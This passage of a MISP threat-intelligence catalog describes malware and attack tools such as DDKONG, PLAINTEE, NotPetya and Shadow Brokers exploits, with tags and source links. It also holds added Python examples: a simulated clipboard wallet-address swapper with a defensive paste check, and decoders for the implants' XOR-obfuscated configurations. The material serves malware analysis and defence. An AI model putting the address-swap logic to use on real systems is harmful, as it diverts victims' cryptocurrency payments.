The group behind BabaYaga, believed to be Russian-speaking hackers, uses this malware to inject sites with special keywords to drive SEO traffic to hidden pages on compromised sites. These pages are then used to redirect users to affiliate marketing links, where if the user purchases advertised goods, the hackers also make a profit. The malware itself is comprised of two modules: one that injects the spam content inside the compromised sites, and a backdoor module that gives attackers control over an infected site at any time. The intricacies of both modules are detailed in much more depth in a 26-page report authored by Defiant (formerly known as WordFence), the security firm which dissected the malware's more recent versions. "[BabaYaga] is relatively well-written, and it demonstrates that the author has some understanding of software development challenges, like code deployment, performance and management," Defiant researchers say. "It can also infect Joomla and Drupal sites, or even generic PHP sites, but it is most fully developed around Wordpress."

The tag is: misp-galaxy:tool="BabaYaga"

Table 16634. Table References

Links

https://www.bleepingcomputer.com/news/security/lol-babayaga-wordpress-malware-updates-your-site/

InvisiMole

Except for the malware's binary file, very little is known of who is behind it, how it spreads, or in what types of campaigns it has been used.

"Our telemetry indicates that the malicious actors behind this malware have been active at least since 2013, yet the cyber-espionage tool was never analyzed nor detected until discovered by ESET products on compromised computers in Ukraine and Russia," said ESET researcher Zuzana Hromcová, who recently penned an in-depth report about this new threat.

"All infection vectors are possible, including installation facilitated by physical access to the machine," Hromcová added.

Typical to malware used in highly-targeted attacks, the malware has been stripped of most clues that could lead researchers back to its author. With the exception of one file (dating to October 13, 2013), all compilation dates have been stripped and replaced with zeros, giving little clues regarding its timeline and lifespan.

Furthermore, the malware is a clever piece of coding in itself: it comprises two modules, each with its own set of spying features, which can also help each other exfiltrate data.

The tag is: misp-galaxy:tool="InvisiMole"

InvisiMole has relationships with:

  • similar: misp-galaxy:malpedia="InvisiMole" with estimative-language:likelihood-probability="likely"

Table 16635. Table References

Links

https://www.bleepingcomputer.com/news/security/invisimole-is-a-complex-spyware-that-can-take-pictures-and-record-audio/

Roaming Mantis

Roaming Mantis malware is designed for distribution through a simple, but very efficient trick based on a technique known as DNS hijacking. When a user attempts to access any website via a compromised router, they will be redirected to a malicious website. For example, if a user were to navigate to www.securelist.com using a web browser, the browser would be redirected to a rogue server which has nothing to do with the security research blog. As long as the browser displays the original URL, users are likely to believe the website is genuine. The web page from the rogue server displays the popup message: To better experience the browsing, update to the latest chrome version.

The tag is: misp-galaxy:tool="Roaming Mantis"

Roaming Mantis has relationships with:

  • similar: misp-galaxy:malpedia="Roaming Mantis" with estimative-language:likelihood-probability="likely"

Table 16636. Table References

Links

https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/

PLEAD Downloader

PLEAD is referred to both as the name of a malware family (including TSCookie) and as its attack campaign. PLEAD comes in two kinds: a RAT (Remote Access Tool) and a downloader. The RAT operates on commands provided by C&C servers. The PLEAD downloader, on the other hand, downloads modules and runs them in memory in the same way as TSCookie does.

The tag is: misp-galaxy:tool="PLEAD Downloader"

Table 16637. Table References

Links

https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html

ClipboardWalletHijacker

The malware’s purpose is to intercept content recorded in the Windows clipboard, look for strings resembling Bitcoin and Ethereum addresses, and replace them with ones owned by the malware’s authors. ClipboardWalletHijacker’s end-plan is to hijack BTC and ETH transactions, so victims unwittingly send funds to the malware’s authors.
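The attack works because a wallet address is an opaque string to the user. The block below is an added example, not code from the page or the cited articles: it reproduces the address-spotting a clipboard hijacker needs, validates legacy Bitcoin addresses with Base58Check, and shows the defensive check that actually catches the swap, comparing the addresses at copy time with the clipboard contents at paste time. The attacker addresses are placeholders, not real indicators; the Ethereum side is pattern-only because an EIP-55 checksum needs Keccak-256, which the Python standard library does not provide.

```python
"""Both sides of the ClipboardWalletHijacker technique: the loose pattern
matching the malware needs to spot wallet addresses in clipboard text, and a
defensive check comparing what was copied with what is about to be pasted.
Base58Check validation catches malformed substitutions but not a well-formed
attacker address, which is why the copy/paste comparison is the real defence."""
import hashlib
import re

BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")  # legacy P2PKH/P2SH addresses
ETH_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Constructed attacker destinations for the simulation (placeholders, not real IoCs).
ATTACKER_BTC = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
ATTACKER_ETH = "0x" + "de" * 20


def hijack(clipboard: str, attacker_btc: str = ATTACKER_BTC,
           attacker_eth: str = ATTACKER_ETH) -> str:
    """Simulated malware behaviour: replace every address-looking token."""
    swapped = BTC_RE.sub(attacker_btc, clipboard)
    return ETH_RE.sub(attacker_eth, swapped)


def base58check_valid(address: str) -> bool:
    """Decode a legacy Bitcoin address and verify its 4-byte double-SHA-256 checksum."""
    if not 26 <= len(address) <= 35:
        return False
    value = 0
    for ch in address:
        digit = B58_ALPHABET.find(ch)
        if digit < 0:
            return False
        value = value * 58 + digit
    try:
        raw = value.to_bytes(25, "big")  # version(1) + hash160(20) + checksum(4)
    except OverflowError:
        return False
    payload, checksum = raw[:21], raw[21:]
    expected = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return checksum == expected


def paste_guard(copied: str, clipboard_now: str) -> bool:
    """Defensive check: True if the addresses present at copy time are unchanged
    at paste time; False means something rewrote the clipboard in between."""
    before = BTC_RE.findall(copied) + ETH_RE.findall(copied)
    after = BTC_RE.findall(clipboard_now) + ETH_RE.findall(clipboard_now)
    return before == after


if __name__ == "__main__":
    copied = "send to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
    tampered = hijack(copied)
    print(tampered)
    print("address valid:", base58check_valid(tampered.split()[-1]))
    print("clipboard intact:", paste_guard(copied, tampered))
```

Note that the swapped-in address can pass the checksum just as the original did, so a wallet or browser extension that only validates the format learns nothing; the useful control is remembering what the user copied and refusing the paste when it differs.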

The tag is: misp-galaxy:tool="ClipboardWalletHijacker"

Table 16638. Table References

Links

https://www.bleepingcomputer.com/news/security/clipboard-hijacker-targeting-bitcoin-and-ethereum-users-infects-over-300-0000-pcs/

https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-transaction-over-300000-computers-have-been-attacked/

TYPEFRAME

Trojan malware

The tag is: misp-galaxy:tool="TYPEFRAME"

Table 16639. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-165A

Olympic Destroyer

The 2018 Winter Olympics were held in Pyeongchang, South Korea. The Guardian, a UK newspaper, reported that the Olympic computer systems suffered technical issues during the opening ceremony. Officials at the games confirmed some technical issues to non-critical systems and completed recovery within around 12 hours. On Sunday 11 February the Olympic games officials confirmed a cyber attack occurred but did not comment or speculate further. Talos identified, with moderate confidence, the samples used in this attack. The infection vector was unknown at the time of analysis. The samples identified, however, are not from adversaries looking for information from the games; they are aimed at disrupting the games. The samples analysed appear to perform only destructive functionality, and there does not appear to be any exfiltration of data. Analysis shows that the actors are again favouring legitimate pieces of software, as PsExec functionality is identified within the sample. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies and event logs and by trying to use PsExec and WMI to move further through the environment. This is something previously witnessed with BadRabbit and Nyetya.

The tag is: misp-galaxy:tool="Olympic Destroyer"

Olympic Destroyer has relationships with:

  • similar: misp-galaxy:malpedia="Olympic Destroyer" with estimative-language:likelihood-probability="likely"

Table 16640. Table References

Links

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://www.bleepingcomputer.com/news/security/malware-that-hit-pyeongchang-olympics-deployed-in-new-attacks/

DDKONG

The malware is configured with the following three exported functions: ServiceMain, Rundll32Call and DllEntryPoint. The ServiceMain export indicates that this DLL is expected to be loaded as a service. If this function is successfully loaded, it ultimately spawns a new instance of itself with the Rundll32Call export via a call to rundll32.exe. The Rundll32Call export begins by creating a named event called 'RunOnce'; this event ensures that only a single instance of DDKONG is executed at a given time. If this is the only instance of DDKONG running, the malware continues; if not, it exits. DDKONG then attempts to decode an embedded configuration using the single-byte XOR key 0xC3. After this configuration is decoded and parsed, DDKONG sends a beacon to the configured remote server via a raw TCP connection. The packet has a header of length 32 and an optional payload. In the beacon, no payload is provided, so the length of this packet is set to zero. After it sends the beacon, the malware expects a response command of either 0x4 or 0x6. Both responses instruct the malware to download and load a remote plugin: if 0x4 is specified, the malware loads the exported 'InitAction' function; if 0x6 is specified, it loads the exported 'KernelDllCmdAction' function. Prior to downloading the plugin, the malware downloads a buffer that is concatenated with the embedded configuration and ultimately provided to the plugin at runtime. Two full file paths are included in this buffer, providing insight into the original malware family's name as well as the author. After this buffer is collected, the malware downloads the plugin and loads the appropriate function.

This plugin provides the attacker with the ability to list files and to download/upload files on the victim machine.

The tag is: misp-galaxy:tool="DDKONG"

DDKONG has relationships with:

  • similar: misp-galaxy:malpedia="DDKONG" with estimative-language:likelihood-probability="likely"

Table 16641. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

PLAINTEE

This sample is configured with three exported functions: Add, Sub and DllEntryPoint. The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed, PLAINTEE runs a command in a new process to add persistence. Next, the malware calls the 'Sub' function, which begins by creating a mutex named 'microsoftfuckedupb' to ensure only a single instance is running at a given time. In addition, PLAINTEE creates a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then collects general system enumeration data about the infected machine and enters a loop in which it decodes an embedded config blob and sends an initial beacon to the C2 server. The configuration blob is encoded with a simple single-byte XOR scheme: the first byte of the blob is the XOR key used to decode the remainder of the data. The malware then beacons to the configured port via a custom UDP protocol. The network traffic is encoded in a similar fashion, with a random byte selected as the first byte and then used to decode the remainder of the packet via XOR. This beacon is sent continuously until a valid response is obtained from the C2 server (there is no sleep timer set); after the initial beacon, there is a two-second delay between all other requests. The response is expected to have a return command of 0x66660002 and to contain the same GUID that was sent to the C2 server. Once this response is received, the malware spawns several new threads with different Command parameters, with the overall objective of loading and executing a new plugin received from the C2 server. During a file analysis of PLAINTEE in WildFire, Unit 42 observed the attackers download and execute a plugin during the runtime of that sample. PLAINTEE expects the downloaded plugin to be a DLL with an export function of either 'shell' or 'file'.

The plugin uses the same network protocol as PLAINTEE, so the further commands that were sent could be trivially decoded. The following commands were observed: tasklist and ipconfig /all. The attacker performed these two commands 33 seconds apart; as automated commands are typically issued more quickly, this indicates that they may have been sent manually by the attacker.
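Both implants in this report protect their configuration with single-byte XOR: DDKONG with the fixed key 0xC3, PLAINTEE with a key carried in the first byte of the blob and of each UDP packet. The following added example (not code from the page or from Unit 42) implements both decoders over a constructed configuration string and adds a known-plaintext key recovery for the case where the key is not documented. The configuration contents and the crib "c2=" are assumptions; the layout of DDKONG's 32-byte beacon header is not described in enough detail to parse here, so it is left out.

```python
"""Decoders for the two single-byte XOR schemes described in the DDKONG and
PLAINTEE entries: DDKONG's embedded configuration uses the fixed key 0xC3;
PLAINTEE's configuration blob and UDP packets carry their key in the first
byte. A known-plaintext key recovery is included for configs whose key is not
documented. Samples are constructed, not taken from real malware."""
import os

DDKONG_KEY = 0xC3


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def decode_ddkong_config(blob: bytes) -> bytes:
    """Fixed-key scheme: every byte XORed with 0xC3."""
    return xor_bytes(blob, DDKONG_KEY)


def encode_plaintee(data: bytes, key: int = -1) -> bytes:
    """Build a PLAINTEE-style blob or packet: the first byte is the (random) key,
    the remainder is the data XORed with it."""
    if key < 0:
        key = os.urandom(1)[0]
    return bytes([key]) + xor_bytes(data, key)


def decode_plaintee(blob: bytes) -> bytes:
    """Key-in-first-byte scheme, used for both the config blob and C2 packets."""
    if not blob:
        raise ValueError("empty blob")
    return xor_bytes(blob[1:], blob[0])


def recover_xor_key(blob: bytes, crib: bytes) -> list:
    """Known-plaintext recovery: every single-byte key under which the crib
    appears in the decoded output. Scoring candidates by printable ASCII alone
    is ambiguous for short configs, since keys that differ in a low bit both
    yield readable text; a crib such as a config field name is decisive."""
    return [k for k in range(256) if crib in xor_bytes(blob, k)]


# Constructed configuration string of the kind such implants embed (assumed format).
SAMPLE_CONFIG = b"c2=203.0.113.10:8080;sleep=2\x00"
DDKONG_BLOB = xor_bytes(SAMPLE_CONFIG, DDKONG_KEY)
PLAINTEE_BLOB = encode_plaintee(SAMPLE_CONFIG, 0x5A)

if __name__ == "__main__":
    print(decode_ddkong_config(DDKONG_BLOB))
    print(decode_plaintee(PLAINTEE_BLOB))
    print([hex(k) for k in recover_xor_key(DDKONG_BLOB, b"c2=")])
```

For PLAINTEE traffic the recovery routine is not needed, because every packet announces its own key; it is useful for a DDKONG-like blob carved from a sample whose key is unknown, and for confirming that the first-byte convention really holds on a captured packet by feeding it the bytes after the first one.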

The tag is: misp-galaxy:tool="PLAINTEE"

PLAINTEE has relationships with:

  • similar: misp-galaxy:malpedia="PLAINTEE" with estimative-language:likelihood-probability="likely"

Table 16642. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. The major difference is that Koadic does most of its operations using Windows Script Host.

The tag is: misp-galaxy:tool="Koadic"

Koadic has relationships with:

  • similar: misp-galaxy:malpedia="Koadic" with estimative-language:likelihood-probability="likely"

Table 16643. Table References

Links

https://github.com/zerosum0x0/koadic

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

Bisonal

In early May 2018, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware, including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, Unit 42 has collected only 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file's contents. Attacks using Bisonal have been blogged about in the past. In 2013, both COSEINC and FireEye revealed attacks using Bisonal against Japanese organizations. In October 2017, AhnLab published a report called "Operation Bitter Biscuit", an attack campaign against South Korea, Japan, India and Russia using Bisonal and its successors, Bioazih and Dexbia.

The tag is: misp-galaxy:tool="Bisonal"

Bisonal has relationships with:

  • similar: misp-galaxy:malpedia="Korlia" with estimative-language:likelihood-probability="likely"

Table 16644. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

https://camal.coseinc.com/publish/2013Bisonal.pdf

Sekur

Sekur has been CARBON SPIDER’s primary tool for several years, although usage over the last year appears to have declined. It contains all the functionality you would expect from a RAT, allowing the adversary to execute commands, manage the file system, manage processes, and collect data. In addition, it can record videos of victim sessions, log keystrokes, enable remote desktop, or install Ammyy Admin or VNC modules. From July 2014 on, samples were compiled with the capability to target Epicor POS systems and to collect credit card data.

The tag is: misp-galaxy:tool="Sekur"

Table 16645. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

Agent ORM

Agent ORM began circulating alongside Sekur in campaigns throughout the second half of 2015. The malware collects basic system information and is able to take screenshots of victim systems. It is used to download next-stage payloads when systems of interest are identified. It is strongly suspected that Agent ORM has been deprecated in favor of script-based first-stage implants (VB Flash, JS Flash, and Bateleur).

The tag is: misp-galaxy:tool="Agent ORM"

Agent ORM is also known as:

  • Tosliph

  • DRIFTPIN

Table 16646. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

VB Flash

VB Flash was first observed being deployed alongside Agent ORM in September 2015. It is likely that this was developed as a replacement to Agent ORM and contained similar capabilities. The first observed instance of VB Flash included comments and was easy to analyze—later versions soon began to integrate multiple layers of obfuscation. Several versions of VB Flash were developed including ones that utilized Google Forms, Google Macros, and Google Spreadsheets together to make a command-and-control (C2) channel. This variant would POST victim data to a specified Google form, then make a request to a Google macro script, receiving an address for a Google Spreadsheet from which to request commands.

The tag is: misp-galaxy:tool="VB Flash"

VB Flash is also known as:

  • HALFBAKED

VB Flash has relationships with:

  • similar: misp-galaxy:mitre-malware="HALFBAKED - S0151" with estimative-language:likelihood-probability="likely"

Table 16647. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

JS Flash

JS Flash capabilities closely resemble those of VB Flash and leverage interesting techniques in deployment via batch scripts embedded as OLE objects in malicious documents. Many iterations of JS Flash were observed being tested before deployment, containing minor changes to obfuscation and more complex additions, such as the ability to download TinyMet (a cutdown of the Metasploit Meterpreter payload). PowerShell was also used heavily for the execution of commands and arbitrary script execution. No JS Flash samples were observed being deployed after November 2017.

The tag is: misp-galaxy:tool="JS Flash"

JS Flash is also known as:

  • JavaScript variant of HALFBAKED

Table 16648. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

Bateleur

Bateleur deployments began not long after JS Flash and were also written in JavaScript. Deployments were more infrequent and testing was not observed. It is likely that Bateleur was run in parallel as an alternative tool and eventually replaced JS Flash as CARBON SPIDER’s first stage tool of choice. Although much simpler in design than JS Flash, all executing out of a single script with more basic obfuscation, Bateleur has a wealth of capabilities—including the ability to download arbitrary scripts and executables, deploy TinyMet, execute commands via PowerShell, deploy a credential stealer, and collect victim system information such as screenshots.

The tag is: misp-galaxy:tool="Bateleur"

Bateleur has relationships with:

  • similar: misp-galaxy:malpedia="Bateleur" with estimative-language:likelihood-probability="likely"

Table 16649. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

JexBoss

A tool for testing and exploiting vulnerabilities in JBoss Application Servers.

The tag is: misp-galaxy:tool="JexBoss"

Table 16650. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

reGeorg

“Provides TCP tunneling over HTTP and bolts a SOCKS4/5 proxy on top of it, so, reGeorg is a fully-functional SOCKS proxy and gives ability to analyze target internal network.”

The tag is: misp-galaxy:tool="reGeorg"

reGeorg has relationships with:

  • similar: misp-galaxy:malpedia="reGeorg" with estimative-language:likelihood-probability="likely"

Table 16651. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

Hyena

Active Directory and Windows system management software that can be used for remote administration of servers and workstations.

The tag is: misp-galaxy:tool="Hyena"

Table 16652. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

csvde.exe

Imports and exports data from Active Directory Lightweight Directory Services (AD LDS) using files that store data in the comma-separated value (CSV) format.

The tag is: misp-galaxy:tool="csvde.exe"

Table 16653. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

NLBrute

A tool to brute-force Remote Desktop Protocol (RDP) passwords.

The tag is: misp-galaxy:tool="NLBrute"

Table 16654. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

xDedic RDP Patch

Used to create new RDP user accounts.

The tag is: misp-galaxy:tool="xDedic RDP Patch"

Table 16655. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

xDedic SysScan

Used to profile servers for potential sale on the dark net.

The tag is: misp-galaxy:tool="xDedic SysScan"

Table 16656. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

Wmiexec

A PsExec-like tool, which executes commands through Windows Management Instrumentation (WMI).

The tag is: misp-galaxy:tool="Wmiexec"

Table 16657. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

RDPWrap

Allows a user to be logged in both locally and remotely at the same time.

The tag is: misp-galaxy:tool="RDPWrap"

Table 16658. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

PsExec

A light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. When a command is executed on a remote computer using PsExec, then the service PSEXESVC will be installed on that system, which means that an executable called psexesvc.exe will execute the commands.

The tag is: misp-galaxy:tool="PsExec"

PsExec has relationships with:

  • similar: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="likely"

Table 16659. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

PAExec

A PsExec-like tool, which lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. When the PAExec service is running on the remote computer, the name of the source system is added to the service’s name, e.g., paexec-<id>-<source computer name>.exe, which can help to identify the entry point of the attack.

The tag is: misp-galaxy:tool="PAExec"

Table 16660. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

KEYMARBLE

This Malware Analysis Report (MAR) is the result of analytic efforts between Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant has been identified as KEYMARBLE. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity.

The tag is: misp-galaxy:tool="KEYMARBLE"

KEYMARBLE has relationships with:

  • similar: misp-galaxy:malpedia="KEYMARBLE" with estimative-language:likelihood-probability="likely"

Table 16661. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-221A

BISKVIT

The BISKVIT Trojan is a multi-component malware written in C#. We dubbed this malware BISKVIT based on the namespaces used in the code, which contain the word “biscuit”. Unfortunately, there is already an existing unrelated malware called BISCUIT, so BISKVIT is used instead, which is the Russian translation of biscuit.

The tag is: misp-galaxy:tool="BISKVIT"

Table 16662. Table References

Links

https://www.fortinet.com/blog/threat-research/russian-army-exhibition-decoy-leads-to-new-biskvit-malware.html

Sirefef

This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:

  • Downloading and running other files

  • Contacting remote hosts

  • Disabling security features

Members of the family can also change search results, which can generate money for the hackers who use Sirefef.

The tag is: misp-galaxy:tool="Sirefef"

Sirefef is also known as:

  • Win32/Sirefef

Table 16663. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2Fsirefef

MagentoCore Malware

A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites. The script is what industry experts call a "payment card scraper" or "skimmer." Hackers breach sites and modify their source code to load the script along with its legitimate files. The script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker’s control.

The tag is: misp-galaxy:tool="MagentoCore Malware"

Table 16664. Table References

Links

https://www.bleepingcomputer.com/news/security/magentocore-malware-found-on-7-339-magento-stores/

NotPetya

Threat actors deploy a tool, called NotPetya, with the purpose of encrypting data on victims' machines and rendering it unusable. The malware was spread through tax software that companies and individuals require for filing taxes in Ukraine. Australia, Estonia, Denmark, Lithuania, Ukraine, the United Kingdom, and the United States issued statements attributing NotPetya to Russian state-sponsored actors. In June 2018, the United States sanctioned Russian organizations believed to have assisted the Russian state-sponsored actors with the operation.

The tag is: misp-galaxy:tool="NotPetya"

NotPetya is also known as:

  • Not Petya

NotPetya has relationships with:

  • similar: misp-galaxy:ransomware="Bad Rabbit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="EternalPetya" with estimative-language:likelihood-probability="likely"

Table 16665. Table References

Links

https://www.cfr.org/interactive/cyber-operations/notpetya

Xbash

Xbash is a malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed using Python and converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution. Xbash aims at discovering unprotected services, deleting the victim’s MySQL, PostgreSQL and MongoDB databases, and demanding a ransom in Bitcoin. Linux-based systems are targeted for ransomware and botnet capabilities. The ransomware targets and deletes Linux databases, and there is no evidence of any functionality that would make recovery possible even after paying the ransom. Windows-based systems, by contrast, are targeted for coinmining and self-propagating capabilities. Xbash spreads by attacking weak passwords and unpatched vulnerabilities.

The tag is: misp-galaxy:tool="Xbash"

Xbash has relationships with:

  • similar: misp-galaxy:malpedia="Xbash" with estimative-language:likelihood-probability="almost-certain"

Table 16666. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

LoJax

A rootkit for the Unified Extensible Firmware Interface (UEFI), used by APT28. The researchers named the rootkit LoJax, after the malicious samples of the LoJack anti-theft software that were discovered earlier this year.

The tag is: misp-galaxy:tool="LoJax"

LoJax has relationships with:

  • similar: misp-galaxy:malpedia="LoJax" with estimative-language:likelihood-probability="almost-certain"

Table 16667. Table References

Links

https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/

https://www.bleepingcomputer.com/news/security/lojax-command-and-control-domains-still-active/

Chainshot

The new piece of malware, which received the name Chainshot, is used in the early stages of an attack to activate a downloader for the final payload in a malicious chain reaction.

The tag is: misp-galaxy:tool="Chainshot"

Chainshot has relationships with:

  • similar: misp-galaxy:malpedia="Chainshot" with estimative-language:likelihood-probability="almost-certain"

Table 16668. Table References

Links

https://www.bleepingcomputer.com/news/security/new-chainshot-malware-found-by-cracking-512-bit-rsa-key/

CroniX

The researchers named this campaign CroniX, a moniker that derives from the malware’s use of Cron to achieve persistence and Xhide to launch executables with fake process names. The cryptocurrency minted on victims’ computers is Monero (XMR), the coin of choice in cryptojacking activities. To make sure that rival activity does not revive, CroniX deletes the binaries of other cryptominers present on the system. Another action CroniX takes to establish supremacy on the machine is to check the names of the processes and kill those that swallow 60% of the CPU or more.

The tag is: misp-galaxy:tool="CroniX"

Table 16669. Table References

Links

https://www.bleepingcomputer.com/news/security/cronix-cryptominer-kills-rivals-to-reign-supreme/

FASTCash

Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.

The tag is: misp-galaxy:tool="FASTCash"

FASTCash has relationships with:

  • similar: misp-galaxy:malpedia="FastCash" with estimative-language:likelihood-probability="almost-certain"

Zebrocy

Zebrocy is a tool used by APT28, which has been observed since late 2015. The communications module used by Zebrocy transmits using HTTP. The implant has key logging and file exfiltration functionality and utilises a file collection capability that identifies files with particular extensions.

The tag is: misp-galaxy:tool="Zebrocy"

Zebrocy is also known as:

  • Zekapab

Zebrocy has relationships with:

  • similar: misp-galaxy:malpedia="Zebrocy" with estimative-language:likelihood-probability="almost-certain"

Table 16670. Table References

Links

https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28

CoalaBot

The tag is: misp-galaxy:tool="CoalaBot"

CoalaBot has relationships with:

  • similar: misp-galaxy:malpedia="CoalaBot" with estimative-language:likelihood-probability="almost-certain"

Table 16671. Table References

Links

https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html

DanderSpritz

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical Windows interface similar to botnet administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for victims not controlled by FuzzBunch. DanderSpritz is the framework for controlling infected machines and differs from FuzzBunch, as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar. DanderSpritz, in contrast, works with a larger range of backdoors, using PeddleCheap on the victim to let operators launch plugins. PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines. Once a connection is established, all DanderSpritz post-exploitation features become available.

The tag is: misp-galaxy:tool="DanderSpritz"

DanderSpritz is also known as:

  • Dander Spritz

Table 16672. Table References

Links

https://securelist.com/darkpulsar/88199/

DarkPulsar

DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control.

The tag is: misp-galaxy:tool="DarkPulsar"

DarkPulsar is also known as:

  • Dark Pulsar

DarkPulsar has relationships with:

  • similar: misp-galaxy:malpedia="DarkPulsar" with estimative-language:likelihood-probability="almost-certain"

Table 16673. Table References

Links

https://securelist.com/darkpulsar/88199/

EASYFUN

EasyFun 2.2.0 Exploit for WDaemon / IIS MDaemon/WorldClient pre 9.5.6 WordClient / IIS6.0 exploit

The tag is: misp-galaxy:tool="EASYFUN"

Table 16674. Table References

Links

https://github.com/misterch0c/shadowbroker

ETCETERABLUE

An exploit for IMail 7.04 to 8.05

The tag is: misp-galaxy:tool="ETCETERABLUE"

Table 16675. Table References

Links

https://github.com/misterch0c/shadowbroker

EXPIREDPAYCHECK

IIS6 exploit

The tag is: misp-galaxy:tool="EXPIREDPAYCHECK"

Table 16676. Table References

Links

https://github.com/misterch0c/shadowbroker

EAGERLEVER

NBT/SMB exploit for Windows NT4.0, 2000, XP SP1 & SP2, 2003 SP1 & Base Release

The tag is: misp-galaxy:tool="EAGERLEVER"

Table 16677. Table References

Links

https://github.com/misterch0c/shadowbroker

ESSAYKEYNOTE

The tag is: misp-galaxy:tool="ESSAYKEYNOTE"

